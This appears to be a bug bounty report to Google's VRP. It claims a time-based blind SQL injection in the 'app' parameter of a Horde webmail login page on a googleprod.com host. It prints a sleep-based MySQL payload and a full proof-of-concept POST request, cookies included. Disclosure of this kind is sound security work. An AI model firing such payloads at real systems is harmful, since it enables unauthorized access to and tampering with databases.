Summary:
SQL injection in zombo.googleprod.com via app parametar
Program:
Google VRP
URL:
https://zombo.googleprod.com/horde/login.php
Vulnerability type:
SQL Injection (SQLi)
Details
What is googleprod.com?
Googleprod.com appears to be a domain associated with Google's production environment. It is used internally for various services and applications. Access to this domain is typically restricted to Google's internal network and is not intended for public use.
Issue detail
The app parameter appears to be vulnerable to SQL injection attacks. The payload '+(select*from(select(sleep(20)))a)+' was submitted in the app parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.
The database appears to be MySQL.
PoC:
Request:
POST /horde/login.php HTTP/2
Host: zombo.googleprod.com
Cookie: Horde=7heb8ntc9c73molesaa3as6ov6; webmail-choice=roundcube; roundcube_sessid=rfblae21v5uvgnv4sroisduqif; interworx-cp=hbm1qpcotsqne7hc4ov6v13b8q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: https://zombo.googleprod.com
Referer: https://zombo.googleprod.com/horde/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
Te: trailers
app='%2b(select*from(select(sleep(20)))a)%2b'&login_post=1&url=&anchor_string=&horde_user=Username&horde_pass=Password&horde_select_view=basic&new_lang=en_US
Response:
see photo
Attack scenario
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.